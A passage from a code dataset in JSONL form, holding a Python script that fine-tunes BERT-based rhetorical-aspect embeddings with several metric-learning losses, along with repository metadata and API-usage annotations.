"line_number": 514, "usage_type": "call"}, {"api_name": "numpy.swapaxes", "line_number": 515, "usage_type": "call"}, {"api_name": "numpy.swapaxes", "line_number": 516, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 527, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 530, "usage_type": "call"}, {"api_name": "numpy.longlong", "line_number": 530, "usage_type": "attribute"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 538, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 544, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 550, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 555, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 555, "usage_type": "attribute"}, {"api_name": "torch.from_numpy", "line_number": 555, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 556, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 556, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 565, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 565, "usage_type": "name"}, {"api_name": "torch.nn.NLLLoss", "line_number": 566, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 566, "usage_type": "attribute"}, {"api_name": "torch.optim.lr_scheduler.ReduceLROnPlateau", "line_number": 568, "usage_type": "call"}, {"api_name": "early_stopping.EarlyStopping", "line_number": 595, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 627, "usage_type": "call"}, {"api_name": "torch.DoubleTensor", "line_number": 629, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 632, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 638, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 643, "usage_type": "call"}, {"api_name": "sklearn.metrics.precision_score", "line_number": 644, "usage_type": "call"}, {"api_name": "sklearn.metrics.recall_score", "line_number": 645, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 646, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_curve", "line_number": 657, 
"usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 658, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 665, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 666, "usage_type": "call"}, {"api_name": "early_stopping.early_stop", "line_number": 686, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 691, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 696, "usage_type": "call"}, {"api_name": "torch.cuda.empty_cache", "line_number": 709, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 709, "usage_type": "attribute"}]} +{"seq_id": "22511070015", "text": "import logging\nimport math\nimport os\nimport random\nimport shutil\n\nimport datasets\nfrom datasets import load_dataset\nimport numpy as np\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nfrom tqdm.auto import tqdm\n\nimport transformers\nfrom accelerate import Accelerator\nfrom transformers import (\n AdamW,\n AutoTokenizer,\n DataCollatorWithPadding,\n default_data_collator,\n get_scheduler,\n set_seed,\n)\n\nimport modules.args as args\nfrom modules.models import (\n BertCls,\n BertClsSoftmaxCrossEntropyLoss,\n BertClsArcFaceLoss,\n TripletMarginLoss,\n MultiSimilarityLoss,\n NTXentLoss,\n)\nfrom modules.utils import AccuracyCalculator\nfrom modules.samplers import (\n MPerClassSampler, \n MPerClassSamplerWithoutEasyPostives\n)\n\nlogger = logging.getLogger(__name__)\n\n\ndef choose_loss(args, num_labels):\n if args.loss_type == \"softmax\":\n model = BertClsSoftmaxCrossEntropyLoss(\n model_name_or_path=args.model_name_or_path,\n num_labels=num_labels,\n )\n return model, None\n elif args.loss_type == \"arcface\":\n model = BertClsArcFaceLoss(\n model_name_or_path=args.model_name_or_path,\n num_labels=num_labels,\n margin=args.margin,\n scale=args.scale\n )\n return model, None\n elif args.loss_type == \"triplet\":\n bert_model = BertCls(\n model_name_or_path=args.model_name_or_path\n )\n loss_model = TripletMarginLoss(\n margin=args.margin,\n triplets_per_anchor=\"all\"\n )\n return bert_model, loss_model\n elif args.loss_type == \"ms\":\n bert_model = BertCls(\n model_name_or_path=args.model_name_or_path\n )\n loss_model = MultiSimilarityLoss(\n alpha=args.alpha,\n beta=args.beta,\n base=args.base\n )\n return bert_model, loss_model\n elif args.loss_type == \"ntxent\":\n bert_model = BertCls(\n model_name_or_path=args.model_name_or_path\n )\n loss_model = NTXentLoss(\n temperature=args.temperature\n )\n return bert_model, loss_model\n else:\n logging.error(\"choose one loss model\")\n exit(1)\n\n\ndef main(args):\n # Initialize the accelerator. 
We will let the accelerator handle device placement for us in this example.\n accelerator = Accelerator()\n # Make one log on every process with the configuration for debugging.\n logging.basicConfig(\n format=\"%(asctime)s - %(levelname)s - %(name)s - %(message)s\",\n datefmt=\"%m/%d/%Y %H:%M:%S\",\n level=logging.INFO,\n )\n logger.info(accelerator.state)\n\n # Setup logging, we only want one process per machine to log things on the screen.\n # accelerator.is_local_main_process is only True for one process per machine.\n logger.setLevel(logging.INFO if accelerator.is_local_main_process else logging.ERROR)\n if accelerator.is_local_main_process:\n datasets.utils.logging.set_verbosity_warning()\n transformers.utils.logging.set_verbosity_info()\n else:\n datasets.utils.logging.set_verbosity_error()\n transformers.utils.logging.set_verbosity_error()\n\n # If passed along, set the training seed now.\n if args.seed is not None:\n set_seed(args.seed)\n\n # Handle the repository creation\n if accelerator.is_main_process:\n if args.output_dir is not None:\n os.makedirs(args.output_dir)\n accelerator.wait_for_everyone()\n\n # Loading the dataset from local csv or json file.\n data_files = {}\n if args.train_file is not None:\n data_files[\"train\"] = args.train_file\n if args.validation_file is not None:\n data_files[\"validation\"] = args.validation_file\n\n raw_datasets = load_dataset('json', data_files=data_files)\n\n # A useful fast method:\n # https://huggingface.co/docs/datasets/package_reference/main_classes.html#datasets.Dataset.unique\n if args.label_num is not None:\n label_list = [f\"{i:02}\" for i in range(1, args.label_num+1)]\n else:\n label_list = raw_datasets[\"train\"].unique(\"label\") + raw_datasets[\"validation\"].unique(\"label\")\n label_list = list(set(label_list))\n label_list.sort() # Let's sort it for determinism\n num_labels = len(label_list)\n\n ngram_list = raw_datasets[\"train\"].unique(\"ngram\") + raw_datasets[\"validation\"].unique(\"ngram\")\n\n # Load pretrained model and tokenizer\n #\n # In distributed training, the .from_pretrained methods guarantee that only one local process can concurrently\n # download model & vocab.\n tokenizer = AutoTokenizer.from_pretrained(args.model_name_or_path, use_fast=not args.use_slow_tokenizer)\n\n sentence_key = \"text\"\n\n label_to_id = {v: i for i, v in enumerate(label_list)}\n ngram_to_id = {v: i for i, v in enumerate(ngram_list)}\n\n padding = \"max_length\" if args.pad_to_max_length else False\n\n def preprocess_function(examples):\n # Tokenize the texts\n texts = (\n (examples[sentence_key],)\n )\n result = tokenizer(*texts, padding=padding, max_length=args.max_length, truncation=True)\n\n if \"label\" in examples:\n if label_to_id is not None:\n # Map labels to IDs (not necessary for GLUE tasks)\n result[\"labels\"] = [label_to_id[l] for l in examples[\"label\"]]\n else:\n # In all cases, rename the column to labels because the model will expect that.\n result[\"labels\"] = examples[\"label\"]\n\n result[\"ngram_ids\"] = [ngram_to_id[l] for l in examples[\"ngram\"]]\n return result\n\n with accelerator.main_process_first():\n processed_datasets = raw_datasets.map(\n preprocess_function,\n batched=True,\n remove_columns=raw_datasets[\"train\"].column_names,\n desc=\"Running tokenizer on dataset\",\n )\n\n train_dataset = processed_datasets[\"train\"]\n eval_dataset = processed_datasets[\"validation\"]\n\n # Log a few random samples from the training set:\n for index in random.sample(range(len(train_dataset)), 3):\n 
logger.info(f\"Sample {index} of the training set: {train_dataset[index]}.\")\n\n # DataLoaders creation:\n if args.pad_to_max_length:\n # If padding was already done ot max length, we use the default data collator that will just convert everything\n # to tensors.\n data_collator = default_data_collator\n else:\n # Otherwise, `DataCollatorWithPadding` will apply dynamic padding for us (by padding to the maximum length of\n # the samples passed). When using mixed precision, we add `pad_to_multiple_of=8` to pad all tensors to multiple\n # of 8s, which will enable the use of Tensor Cores on NVIDIA hardware with compute capability >= 7.5 (Volta).\n data_collator = DataCollatorWithPadding(tokenizer, pad_to_multiple_of=(8 if accelerator.use_fp16 else None))\n\n # Classification loss or embedding loss\n if args.loss_type in [\"softmax\", \"arcface\"]:\n model, _ = choose_loss(args, num_labels)\n else:\n model, loss_model = choose_loss(args, num_labels)\n\n\n train_sampler = None\n eval_sampler = None\n if args.m_per_class_sampler:\n train_sampler = MPerClassSampler(\n train_dataset[\"labels\"], \n args.sample_per_class_in_train_batch,\n batch_size=args.per_device_train_batch_size,\n length_before_new_iter=len(train_dataset[\"labels\"])\n )\n eval_sampler = MPerClassSampler(\n eval_dataset[\"labels\"], \n args.sample_per_class_in_eval_batch,\n batch_size=args.per_device_eval_batch_size,\n length_before_new_iter=len(eval_dataset[\"labels\"])\n )\n if args.m_per_class_sampler_without_easy_positives:\n train_sampler = MPerClassSamplerWithoutEasyPostives(\n train_dataset[\"labels\"],\n train_dataset[\"ngram_ids\"], \n args.sample_per_class_in_train_batch,\n batch_size=args.per_device_train_batch_size,\n length_before_new_iter=len(train_dataset[\"labels\"])\n )\n eval_sampler = MPerClassSamplerWithoutEasyPostives(\n eval_dataset[\"labels\"],\n eval_dataset[\"ngram_ids\"],\n args.sample_per_class_in_eval_batch,\n batch_size=args.per_device_eval_batch_size,\n length_before_new_iter=len(eval_dataset[\"labels\"])\n )\n train_dataloader = DataLoader(\n train_dataset, \n shuffle=(train_sampler is None),\n sampler=train_sampler, \n collate_fn=data_collator, \n batch_size=args.per_device_train_batch_size,\n drop_last=True\n )\n eval_dataloader = DataLoader(\n eval_dataset, \n shuffle=(eval_sampler is None),\n sampler=eval_sampler, \n collate_fn=data_collator, \n batch_size=args.per_device_eval_batch_size,\n drop_last=True\n )\n\n # Optimizer\n # Split weights in two groups, one with weight decay and the other not.\n no_decay = [\"bias\", \"LayerNorm.weight\"]\n optimizer_grouped_parameters = [\n {\n \"params\": [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],\n \"weight_decay\": args.weight_decay,\n },\n {\n \"params\": [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)],\n \"weight_decay\": 0.0,\n },\n ]\n optimizer = AdamW(optimizer_grouped_parameters, lr=args.learning_rate)\n\n # Prepare everything with our `accelerator`.\n model, optimizer, train_dataloader, eval_dataloader = accelerator.prepare(\n model, optimizer, train_dataloader, eval_dataloader\n )\n\n # Note -> the training dataloader needs to be prepared before we grab his length below (cause its length will be\n # shorter in multiprocess)\n\n # Scheduler and math around the number of training steps.\n num_update_steps_per_epoch = math.ceil(len(train_dataloader) / args.gradient_accumulation_steps)\n\n args.max_train_steps = args.num_train_epochs * num_update_steps_per_epoch\n\n lr_scheduler = 
get_scheduler(\n name=args.lr_scheduler_type,\n optimizer=optimizer,\n num_warmup_steps=args.num_warmup_steps,\n num_training_steps=args.max_train_steps,\n )\n\n accuracy_calculator = AccuracyCalculator(k=\"max_bin_count\", include=(\"precision_at_1\", \"r_precision\", \"mean_average_precision_at_r\"))\n\n # Train!\n total_batch_size = args.per_device_train_batch_size * accelerator.num_processes * args.gradient_accumulation_steps\n\n logger.info(\"***** Running training *****\")\n logger.info(f\" Num examples = {len(train_dataset)}\")\n logger.info(f\" Num Epochs = {args.num_train_epochs}\")\n logger.info(f\" Instantaneous batch size per device = {args.per_device_train_batch_size}\")\n logger.info(f\" Total train batch size (w. parallel, distributed & accumulation) = {total_batch_size}\")\n logger.info(f\" Gradient Accumulation steps = {args.gradient_accumulation_steps}\")\n logger.info(f\" Total optimization steps = {args.max_train_steps}\")\n\n\n model.eval()\n\n embeddings = []\n labels = []\n\n for step, batch in enumerate(tqdm(eval_dataloader)):\n if step < 5:\n logger.info(f\"[labels in eval batch {step}]\")\n logger.info(batch[\"labels\"])\n logger.info(f\"[ngram_ids in eval batch {step}]\")\n logger.info(batch[\"ngram_ids\"])\n\n batch.pop(\"ngram_ids\")\n outputs = model(**batch)\n\n # In evaluation, embeddings are L2 normalized\n normalized_embeddings = F.normalize(outputs.embeddings, p=2, dim=1)\n embeddings.append(accelerator.gather(normalized_embeddings).detach().cpu().numpy())\n labels.append(accelerator.gather(batch[\"labels\"]).detach().cpu().numpy())\n\n embeddings = np.concatenate(embeddings)\n labels = np.concatenate(labels)\n embeddings = embeddings[:len(eval_dataloader.dataset)]\n labels = labels[:len(eval_dataloader.dataset)]\n\n eval_metric = accuracy_calculator.get_accuracy(embeddings, embeddings, labels, labels, True)\n\n results_txt = \"\"\n current_record = 0\n current_record_epoch_or_step = -1\n logger.info(f\"epoch -1 (before training): {eval_metric}\")\n results_txt += f\"epoch -1 (before training): {eval_metric}\\n\"\n\n\n progress_bar = tqdm(range(args.max_train_steps), disable=not accelerator.is_local_main_process)\n completed_steps = 0\n\n for epoch in range(args.num_train_epochs):\n model.train()\n\n for step, batch in enumerate(train_dataloader):\n if epoch == 0 and step < 5:\n logger.info(f\"[labels in train batch {step}]\")\n logger.info(batch[\"labels\"])\n logger.info(f\"[ngram_ids in train batch {step}]\")\n logger.info(batch[\"ngram_ids\"])\n\n batch.pop(\"ngram_ids\")\n\n if args.loss_type in [\"softmax\", \"arcface\"]:\n outputs = model(**batch)\n loss = outputs.loss\n\n else:\n outputs = model(**batch)\n embeddings_in_batch = outputs.embeddings\n labels_in_batch = batch[\"labels\"]\n\n loss = loss_model(embeddings_in_batch, labels_in_batch)\n\n loss = loss / args.gradient_accumulation_steps\n accelerator.backward(loss)\n\n if step % args.gradient_accumulation_steps == 0 or step == len(train_dataloader) - 1:\n optimizer.step()\n lr_scheduler.step()\n optimizer.zero_grad()\n progress_bar.update(1)\n completed_steps += 1\n\n if completed_steps >= args.max_train_steps:\n break\n\n \n if args.eval_steps is not None and completed_steps % args.eval_steps == 0:\n embeddings = []\n labels = []\n\n model.eval()\n for step, batch in enumerate(eval_dataloader):\n batch.pop(\"ngram_ids\")\n outputs = model(**batch)\n\n # In evaluation, embeddings are L2 normalized\n normalized_embeddings = F.normalize(outputs.embeddings, p=2, dim=1)\n 
embeddings.append(accelerator.gather(normalized_embeddings).detach().cpu().numpy())\n labels.append(accelerator.gather(batch[\"labels\"]).detach().cpu().numpy())\n\n embeddings = np.concatenate(embeddings)\n labels = np.concatenate(labels)\n embeddings = embeddings[:len(eval_dataloader.dataset)]\n labels = labels[:len(eval_dataloader.dataset)]\n\n eval_metric = accuracy_calculator.get_accuracy(embeddings, embeddings, labels, labels, True)\n\n\n logger.info(f\"step {completed_steps}: {eval_metric}\")\n results_txt += f\"step {completed_steps}: {eval_metric}\\n\"\n\n # save model if it achieves new record\n if eval_metric[\"mean_average_precision_at_r\"] > current_record:\n accelerator.wait_for_everyone()\n unwrapped_model = accelerator.unwrap_model(model)\n accelerator.save(unwrapped_model.state_dict(), os.path.join(args.output_dir, f\"pytorch_model_step{completed_steps}.bin\"))\n current_record = eval_metric[\"mean_average_precision_at_r\"]\n current_record_epoch_or_step = completed_steps\n\n\n if args.eval_steps is not None:\n continue\n\n embeddings = []\n labels = []\n\n model.eval()\n for step, batch in enumerate(eval_dataloader):\n batch.pop(\"ngram_ids\")\n outputs = model(**batch)\n\n # In evaluation, embeddings are L2 normalized\n normalized_embeddings = F.normalize(outputs.embeddings, p=2, dim=1)\n embeddings.append(accelerator.gather(normalized_embeddings).detach().cpu().numpy())\n labels.append(accelerator.gather(batch[\"labels\"]).detach().cpu().numpy())\n\n embeddings = np.concatenate(embeddings)\n labels = np.concatenate(labels)\n embeddings = embeddings[:len(eval_dataloader.dataset)]\n labels = labels[:len(eval_dataloader.dataset)]\n\n eval_metric = accuracy_calculator.get_accuracy(embeddings, embeddings, labels, labels, True)\n\n\n logger.info(f\"epoch {epoch}: {eval_metric}\")\n results_txt += f\"epoch {epoch}: {eval_metric}\\n\"\n\n # save model if it achieves new record\n if eval_metric[\"mean_average_precision_at_r\"] > current_record:\n accelerator.wait_for_everyone()\n unwrapped_model = accelerator.unwrap_model(model)\n accelerator.save(unwrapped_model.state_dict(), os.path.join(args.output_dir, f\"pytorch_model_epoch{epoch}.bin\"))\n current_record = eval_metric[\"mean_average_precision_at_r\"]\n current_record_epoch_or_step = epoch\n\n\n if args.output_dir is not None:\n if args.eval_steps is not None:\n shutil.copyfile(\n os.path.join(args.output_dir, f\"pytorch_model_step{current_record_epoch_or_step}.bin\"), \n os.path.join(args.output_dir, f\"pytorch_model.bin\")\n )\n results_txt += f\"best step: {current_record_epoch_or_step}\\n\"\n\n # delete temporary models\n for step in range(args.max_train_steps):\n target_file = os.path.join(args.output_dir, f\"pytorch_model_step{step}.bin\")\n if os.path.isfile(target_file):\n os.remove(target_file)\n\n else:\n shutil.copyfile(\n os.path.join(args.output_dir, f\"pytorch_model_epoch{current_record_epoch_or_step}.bin\"), \n os.path.join(args.output_dir, f\"pytorch_model.bin\")\n )\n results_txt += f\"best epoch: {current_record_epoch_or_step}\\n\"\n\n # delete temporary models\n for epoch in range(args.num_train_epochs):\n target_file = os.path.join(args.output_dir, f\"pytorch_model_epoch{epoch}.bin\")\n if os.path.isfile(target_file):\n os.remove(target_file)\n\n if accelerator.is_main_process:\n unwrapped_model.config.save_pretrained(args.output_dir)\n tokenizer.save_pretrained(args.output_dir)\n\n with open(os.path.join(args.output_dir, \"results.txt\"), \"w\", encoding=\"utf-8\") as f:\n f.write(results_txt)\n\n\nif 
__name__ == \"__main__\":\n args = args.parse_args()\n main(args)", "repo_name": "kaisugi/rhetorical_aspect_embeddings", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 18516, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 40, "usage_type": "call"}, {"api_name": "modules.args.loss_type", "line_number": 44, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 44, "usage_type": "name"}, {"api_name": "modules.models.BertClsSoftmaxCrossEntropyLoss", "line_number": 45, "usage_type": "call"}, {"api_name": "modules.args.model_name_or_path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 46, "usage_type": "name"}, {"api_name": "modules.args.loss_type", "line_number": 50, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 50, "usage_type": "name"}, {"api_name": "modules.models.BertClsArcFaceLoss", "line_number": 51, "usage_type": "call"}, {"api_name": "modules.args.model_name_or_path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 52, "usage_type": "name"}, {"api_name": "modules.args.margin", "line_number": 54, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 54, "usage_type": "name"}, {"api_name": "modules.args.scale", "line_number": 55, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 55, "usage_type": "name"}, {"api_name": "modules.args.loss_type", "line_number": 58, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 58, "usage_type": "name"}, {"api_name": "modules.models.BertCls", "line_number": 59, "usage_type": "call"}, {"api_name": "modules.args.model_name_or_path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 60, "usage_type": "name"}, {"api_name": "modules.models.TripletMarginLoss", "line_number": 62, "usage_type": "call"}, {"api_name": "modules.args.margin", "line_number": 63, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 63, "usage_type": "name"}, {"api_name": "modules.args.loss_type", "line_number": 67, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 67, "usage_type": "name"}, {"api_name": "modules.models.BertCls", "line_number": 68, "usage_type": "call"}, {"api_name": "modules.args.model_name_or_path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 69, "usage_type": "name"}, {"api_name": "modules.models.MultiSimilarityLoss", "line_number": 71, "usage_type": "call"}, {"api_name": "modules.args.alpha", "line_number": 72, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 72, "usage_type": "name"}, {"api_name": "modules.args.beta", "line_number": 73, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 73, "usage_type": "name"}, {"api_name": "modules.args.base", "line_number": 74, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 74, "usage_type": "name"}, {"api_name": "modules.args.loss_type", "line_number": 77, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 77, "usage_type": "name"}, {"api_name": "modules.models.BertCls", "line_number": 78, "usage_type": "call"}, {"api_name": "modules.args.model_name_or_path", "line_number": 79, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 79, 
"usage_type": "name"}, {"api_name": "modules.models.NTXentLoss", "line_number": 81, "usage_type": "call"}, {"api_name": "modules.args.temperature", "line_number": 82, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 82, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 86, "usage_type": "call"}, {"api_name": "accelerate.Accelerator", "line_number": 92, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 94, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 97, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 103, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 103, "usage_type": "attribute"}, {"api_name": "datasets.utils.logging.set_verbosity_warning", "line_number": 105, "usage_type": "call"}, {"api_name": "datasets.utils", "line_number": 105, "usage_type": "attribute"}, {"api_name": "transformers.utils.logging.set_verbosity_info", "line_number": 106, "usage_type": "call"}, {"api_name": "transformers.utils", "line_number": 106, "usage_type": "attribute"}, {"api_name": "datasets.utils.logging.set_verbosity_error", "line_number": 108, "usage_type": "call"}, {"api_name": "datasets.utils", "line_number": 108, "usage_type": "attribute"}, {"api_name": "transformers.utils.logging.set_verbosity_error", "line_number": 109, "usage_type": "call"}, {"api_name": "transformers.utils", "line_number": 109, "usage_type": "attribute"}, {"api_name": "modules.args.seed", "line_number": 112, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 112, "usage_type": "name"}, {"api_name": "transformers.set_seed", "line_number": 113, "usage_type": "call"}, {"api_name": "modules.args.seed", "line_number": 113, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 113, "usage_type": "name"}, {"api_name": "modules.args.output_dir", "line_number": 117, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 117, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 118, "usage_type": "call"}, {"api_name": "modules.args.output_dir", "line_number": 118, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 118, "usage_type": "name"}, {"api_name": "modules.args.train_file", "line_number": 123, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 123, "usage_type": "name"}, {"api_name": "modules.args.train_file", "line_number": 124, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 124, "usage_type": "name"}, {"api_name": "modules.args.validation_file", "line_number": 125, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 125, "usage_type": "name"}, {"api_name": "modules.args.validation_file", "line_number": 126, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 126, "usage_type": "name"}, {"api_name": "datasets.load_dataset", "line_number": 128, "usage_type": "call"}, {"api_name": "modules.args.label_num", "line_number": 132, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 132, "usage_type": "name"}, {"api_name": "modules.args.label_num", "line_number": 133, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 133, "usage_type": "name"}, {"api_name": "transformers.AutoTokenizer.from_pretrained", "line_number": 146, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer", "line_number": 146, "usage_type": "name"}, {"api_name": "modules.args.model_name_or_path", "line_number": 146, 
"usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 146, "usage_type": "name"}, {"api_name": "modules.args.use_slow_tokenizer", "line_number": 146, "usage_type": "attribute"}, {"api_name": "modules.args.pad_to_max_length", "line_number": 153, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 153, "usage_type": "name"}, {"api_name": "modules.args.max_length", "line_number": 160, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 160, "usage_type": "name"}, {"api_name": "random.sample", "line_number": 185, "usage_type": "call"}, {"api_name": "modules.args.pad_to_max_length", "line_number": 189, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 189, "usage_type": "name"}, {"api_name": "transformers.default_data_collator", "line_number": 192, "usage_type": "name"}, {"api_name": "transformers.DataCollatorWithPadding", "line_number": 197, "usage_type": "call"}, {"api_name": "modules.args.loss_type", "line_number": 200, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 200, "usage_type": "name"}, {"api_name": "modules.args", "line_number": 201, "usage_type": "argument"}, {"api_name": "modules.args", "line_number": 203, "usage_type": "argument"}, {"api_name": "modules.args.m_per_class_sampler", "line_number": 208, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 208, "usage_type": "name"}, {"api_name": "modules.samplers.MPerClassSampler", "line_number": 209, "usage_type": "call"}, {"api_name": "modules.args.sample_per_class_in_train_batch", "line_number": 211, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 211, "usage_type": "name"}, {"api_name": "modules.args.per_device_train_batch_size", "line_number": 212, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 212, "usage_type": "name"}, {"api_name": "modules.samplers.MPerClassSampler", "line_number": 215, "usage_type": "call"}, {"api_name": "modules.args.sample_per_class_in_eval_batch", "line_number": 217, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 217, "usage_type": "name"}, {"api_name": "modules.args.per_device_eval_batch_size", "line_number": 218, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 218, "usage_type": "name"}, {"api_name": "modules.args.m_per_class_sampler_without_easy_positives", "line_number": 221, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 221, "usage_type": "name"}, {"api_name": "modules.samplers.MPerClassSamplerWithoutEasyPostives", "line_number": 222, "usage_type": "call"}, {"api_name": "modules.args.sample_per_class_in_train_batch", "line_number": 225, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 225, "usage_type": "name"}, {"api_name": "modules.args.per_device_train_batch_size", "line_number": 226, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 226, "usage_type": "name"}, {"api_name": "modules.samplers.MPerClassSamplerWithoutEasyPostives", "line_number": 229, "usage_type": "call"}, {"api_name": "modules.args.sample_per_class_in_eval_batch", "line_number": 232, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 232, "usage_type": "name"}, {"api_name": "modules.args.per_device_eval_batch_size", "line_number": 233, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 233, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 236, "usage_type": "call"}, 
{"api_name": "modules.args.per_device_train_batch_size", "line_number": 241, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 241, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 244, "usage_type": "call"}, {"api_name": "modules.args.per_device_eval_batch_size", "line_number": 249, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 249, "usage_type": "name"}, {"api_name": "modules.args.weight_decay", "line_number": 259, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 259, "usage_type": "name"}, {"api_name": "transformers.AdamW", "line_number": 266, "usage_type": "call"}, {"api_name": "modules.args.learning_rate", "line_number": 266, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 266, "usage_type": "name"}, {"api_name": "math.ceil", "line_number": 277, "usage_type": "call"}, {"api_name": "modules.args.gradient_accumulation_steps", "line_number": 277, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 277, "usage_type": "name"}, {"api_name": "modules.args.max_train_steps", "line_number": 279, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 279, "usage_type": "name"}, {"api_name": "modules.args.num_train_epochs", "line_number": 279, "usage_type": "attribute"}, {"api_name": "transformers.get_scheduler", "line_number": 281, "usage_type": "call"}, {"api_name": "modules.args.lr_scheduler_type", "line_number": 282, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 282, "usage_type": "name"}, {"api_name": "modules.args.num_warmup_steps", "line_number": 284, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 284, "usage_type": "name"}, {"api_name": "modules.args.max_train_steps", "line_number": 285, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 285, "usage_type": "name"}, {"api_name": "modules.utils.AccuracyCalculator", "line_number": 288, "usage_type": "call"}, {"api_name": "modules.args.per_device_train_batch_size", "line_number": 291, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 291, "usage_type": "name"}, {"api_name": "modules.args.gradient_accumulation_steps", "line_number": 291, "usage_type": "attribute"}, {"api_name": "modules.args.num_train_epochs", "line_number": 295, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 295, "usage_type": "name"}, {"api_name": "modules.args.per_device_train_batch_size", "line_number": 296, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 296, "usage_type": "name"}, {"api_name": "modules.args.gradient_accumulation_steps", "line_number": 298, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 298, "usage_type": "name"}, {"api_name": "modules.args.max_train_steps", "line_number": 299, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 299, "usage_type": "name"}, {"api_name": "tqdm.auto.tqdm", "line_number": 307, "usage_type": "call"}, {"api_name": "torch.nn.functional.normalize", "line_number": 318, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 318, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 323, "usage_type": "call"}, {"api_name": "tqdm.auto.tqdm", "line_number": 336, "usage_type": "call"}, {"api_name": "modules.args.max_train_steps", 